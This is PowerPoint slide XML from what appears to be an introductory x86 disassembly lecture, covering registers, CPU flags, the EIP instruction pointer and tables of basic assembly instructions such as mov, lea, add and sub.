          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="4886633"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364486" y="4740876"/>
            <a:ext cx="1519881"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Down Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2780928"/>
            <a:ext cx="43204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Down Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="429309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Down Arrow 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842655" y="4237755"/>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3653397" y="3623775"/>
            <a:ext cx="813043" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>16 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678958" y="5025132"/>
            <a:ext cx="696024" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374982" y="1385736"/>
            <a:ext cx="547650" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EAX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565044" y="2987660"/>
            <a:ext cx="437940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="4417775"/>
            <a:ext cx="461986" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AH</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7202695" y="4417775"/>
            <a:ext cx="415498" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>AL</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9123417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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ZF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: zero flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>CF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: carry flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>SF: sign flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>TF: trap flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>…..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Instruction Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EIP: contains the memory address of the next instruction to be executed -&gt; t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ells CPU what to do next</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995937" y="1772816"/>
            <a:ext cx="4896544" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>When EIP is corrupted, the CPU will not be able to fetch legitimate code  to execute,  therefore the program  running at the time will likely crash. When you control EIP, you can control what is executed by the CPU.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36094201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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Simple instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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200993990"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="2204864"/>
          <a:ext cx="4997408" cy="3566160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1937068"/>
                <a:gridCol w="3060340"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 0x40</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> [0x4037c4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx+esi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>lea </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [ebx+8]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>sub </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 0x10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>add </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1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59348651"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4716016" y="2204864"/>
          <a:ext cx="4248108" cy="3566160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1187768"/>
                <a:gridCol w="3060340"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>inc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
